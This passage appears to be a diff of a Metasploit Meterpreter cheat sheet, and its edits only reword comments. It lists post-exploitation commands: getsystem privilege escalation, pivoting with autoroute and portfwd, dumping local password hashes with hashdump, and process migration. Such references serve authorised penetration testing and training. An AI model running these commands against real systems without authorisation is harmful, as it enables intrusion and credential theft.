 # Privilege escalation

-getsystem # attempt automatic privesc (token impersonation)
+getsystem # attempt automatic privesc via token impersonation

 getuid # confirm if now SYSTEM

-# Pivoting
+# Pivoting into internal networks

 run autoroute -s 192.168.1.0/24 # add route to internal subnet

-portfwd add -l 8080 -p 80 -r 192.168.1.10 # forward remote port locally
+portfwd add -l 8080 -p 80 -r 192.168.1.10 # forward a remote port to localhost

-# Post-exploitation modules
+# Useful post-exploitation modules

-run post/windows/gather/hashdump # dump local hashes
+run post/windows/gather/hashdump # dump local account hashes

 run post/multi/recon/local_exploit_suggester # suggest local privesc exploits

-run post/windows/manage/migrate # migrate to another process
+run post/windows/manage/migrate # migrate to a more stable process

-background # background current session
+background # background the current session

-sessions -l # list all sessions
+sessions -l # list all active sessions

 sessions -i 1 # interact with session 1